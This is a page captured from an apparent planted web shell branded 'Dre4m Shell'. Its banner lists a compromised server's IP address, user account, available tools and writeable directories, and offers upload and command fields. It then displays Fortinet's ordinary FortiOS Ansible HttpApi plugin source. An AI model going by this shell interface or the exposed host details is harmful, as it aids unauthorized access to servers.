Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.188.87.95
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /lib/python3/dist-packages/ansible_collections/fortinet/fortios/plugins/httpapi/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /lib/python3/dist-packages/ansible_collections/fortinet/fortios/plugins/httpapi//fortios.py
# Copyright (c) 2022 Fortinet
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.

from __future__ import (absolute_import, division, print_function)
# Make every class defined in this module a new-style class under Python 2.
__metaclass__ = type

# YAML-formatted plugin metadata: name, short and long description, author
# and the version_added field.
DOCUMENTATION = """
---
name: fortios
short_description: HttpApi Plugin for Fortinet FortiOS Appliance or VM
description:
  - This HttpApi plugin provides methods to connect to Fortinet FortiOS Appliance or VM via REST API
author:
  - Miguel Angel Munoz (@magonzalez)
version_added: "2.0.0"
"""

import json
from ansible.plugins.httpapi import HttpApiBase
from ansible.module_utils.basic import to_text
from ansible.module_utils.six.moves import urllib
import re
# import requests
from datetime import datetime


class HttpApi(HttpApiBase):
    def __init__(self, connection):
        """Initialise plugin state on top of the base class initialisation.

        :param connection: Connection object; passed to the base class and
            also kept as ``_conn`` for option lookups.
        """
        super(HttpApi, self).__init__(connection)
        self._conn = connection

        # Authentication state.
        self._logged_in = False
        self._session_key = ''

        # Version bookkeeping; the device version starts out unknown.
        self._system_version = None
        self._ansible_fos_version = 'v6.0.0'
        self._ansible_galaxy_version = '2.3.0'

        # Log file handle, opened on first use by log().
        self._log = None

    def log(self, msg):
        log_enabled = self._conn.get_option('enable_log')
        if not log_enabled:
            return
        if not self._log:
            self._log = open("/tmp/fortios.ansible.log", "a")
        log_message = str(datetime.now())
        log_message += ": " + str(msg) + '\n'
        self._log.write(log_message)
        self._log.flush()

    def get_access_token(self):
        '''get pre issued access token for API access or session_key from API based authentication.'''
        token = self._conn.get_option('access_token') if 'access_token' in self._conn._options else None

        if not token and self._session_key:
            token = self._session_key

        return token

    def set_become(self, become_context):
        """
        Elevation is not required on Fortinet devices - Skipped
        :param become_context: Unused input.
        :return: None
        """
        return None

    def login(self, username, password):
        """Call a defined login endpoint to receive an authentication token.
        try API based authentication first and fall back to web based auth."""
        if (username is None or password is None) and self.get_access_token() is None:
            raise Exception('Please provide access token or username/password to login')

        if self.get_access_token() is not None:
            self.log('login with access token')
            self._logged_in = True
            self.send_request(url='/logincheck')
            status, dummy = self.send_request(url='/api/v2/monitor/system/status?vdom=root')

            if status == 401:
                raise Exception('Invalid access token. Please check')

            self.log('login with access token succeeded')
            return

        self.log('login with username and password, try API based auth first')
        auth_payload = {
            "username": username,
            "secretkey": str(password),
            "ack_post_disclaimer": True,
            "ack_pre_disclaimer": True,
            "request_key": True
        }
        status_code, result_data = self.send_request(
            url='/api/v2/authentication',
            should_pre_login=False,
            data=json.dumps(auth_payload),
            method='POST',
        )
        if status_code == 401:
            self.log('API based auth login attempt failed, fall back to /logincheck')
            data = "username=" + urllib.parse.quote(username) + "&secretkey=" + urllib.parse.quote(password) + "&ajax=1"
            dummy, result_data = self.send_request(url='/logincheck', should_pre_login=False, data=data, method='POST')
            self.log('/logincheck with user: %s %s' % (username, 'succeeds' if result_data[0] == '1' else 'fails'))
            if result_data[0] != '1':
                raise Exception('Wrong credentials. Please check')
        else:
            self.log('API based auth with user: %s %s' % (username, 'succeeds' if "LOGIN_SUCCESS" in result_data else 'fails'))
            if "LOGIN_SUCCESS" not in result_data:
                raise Exception('Wrong credentials. Please check')
            self._logged_in = True
            try:
                json_result_data = json.loads(result_data)
                self._session_key = json_result_data['session_key']
            except Exception:
                # some older fortios version may pass session key through cookies
                pass

        self.update_system_version()

    def logout(self):
        """ Call to implement session logout."""
        self.log('logout')
        if self._session_key:
            self.send_request(url='/api/v2/authentication', method='DELETE')
        else:
            self.send_request(url='/logout', method="POST")

    def update_auth(self, response, response_text):
        """
        Get cookies and obtain value for csrftoken/session_key that will be used on next requests
        :param response: Response given by the server.
        :param response_text Unused_input.
        :return: Dictionary containing headers
        """
        headers = {
            "Accept": "application/json",
        }

        access_token = self.get_access_token()
        if access_token is not None:
            self.log('using access token - no auth update needed: %s' % access_token)
            return headers

        cookie_dict = {}
        for attr, val in response.getheaders():
            if attr.lower() == 'set-cookie' and 'APSCOOKIE_' in val:
                headers['Cookie'] = val
            elif attr.lower() == 'set-cookie' and 'session_key' in val:
                session_key = re.search(r'_(\d+=\".*\")', val)
                if session_key:
                    cookie_dict["session_key"] = session_key.group(1)
            elif attr.lower() == 'set-cookie' and 'ccsrftoken' in val:
                csrftoken_search = re.search('\"(.*)\"', val)
                if csrftoken_search:
                    headers['x-csrftoken'] = csrftoken_search.group(1)

        if len(cookie_dict) > 0:
            cookie = ""
            for key, value in cookie_dict.items():
                cookie += key + "_" + value + "; "
            if "Cookie" in headers:
                cookie += '; ' + headers["Cookie"]
            headers['Cookie'] = cookie

        self.log('updated auth headers: %s' % (headers.items()))
        return headers

    def handle_httperror(self, exc):
        """
        Propagate HTTP exceptions to the caller after logging them.
        :param exc: Exception
        :return: The same exception object, unchanged.
        """
        message = 'Exception thrown from handling http: ' + to_text(exc)
        self.log(message)
        return exc

    def _concat_token(self, url):
        if self.get_access_token():
            token_pair = 'access_token=' + self.get_access_token()
            return url + '&' + token_pair if '?' in url else url + '?' + token_pair
        return url

    def _concat_params(self, url, params):
        if not params or not len(params):
            return url
        url = url + '?' if '?' not in url else url
        for param_key in params:
            param_value = params[param_key]
            if url[-1] == '?':
                url += '%s=%s' % (param_key, param_value)
            else:
                url += '&%s=%s' % (param_key, param_value)
        return url

    def send_request(self, **message_kwargs):
        """
        Responsible for actual sending of data to the connection httpapi base plugin.
        :param should_pre_login: should perform login in place instead of having connection obj to trigger.
            this is required because for httpapi update_auth can only update headers but /api/v2/authentication
            returns sessio_key in resp body.
        :param message_kwargs: A formatted dictionary containing request info: url, data, method

        :return: Status code and response data.
        """
        if not self._logged_in and message_kwargs.get('should_pre_login', True):
            self.log('perform pre request login')
            self.login(
                self.connection.get_option("remote_user"),
                self.connection.get_option("password"),
            )

        url = message_kwargs.get('url', '/')
        if self.get_access_token() is not None:
            url = self._concat_token(message_kwargs.get('url', '/'))
        data = message_kwargs.get('data', '')
        method = message_kwargs.get('method', 'GET')
        params = message_kwargs.get('params', {})

        url = self._concat_params(url, params)
        self.log('Sending request: METHOD:%s URL:%s DATA:%s' % (method, url, data))

        try:
            response, response_data = self.connection.send(url, data, method=method)

            json_formatted = to_text(response_data.getvalue())

            self.log("response data: %s...<truncated>" % (json_formatted[:200]))
            return response.status, json_formatted
        except Exception as err:
            raise Exception(err)

    def update_system_version(self):
        """
        retrieve the system status of fortigate device
        """
        self.log('checking system_version')
        check_system_status = self._conn.get_option('check_system_status') if 'check_system_status' in self._conn._options else True
        if not check_system_status or self._system_version:
            return
        url = '/api/v2/monitor/system/status?vdom=root'
        status, result = self.send_request(url=url)
        result_json = json.loads(result)
        self._system_version = result_json.get('version', 'undefined')
        self.log('system version: %s' % (self._system_version))
        self.log('ansible version: %s' % (self._ansible_fos_version))

    def get_system_version(self):
        self.update_system_version()
        return self._system_version

Anon7 - 2022
AnonSec Team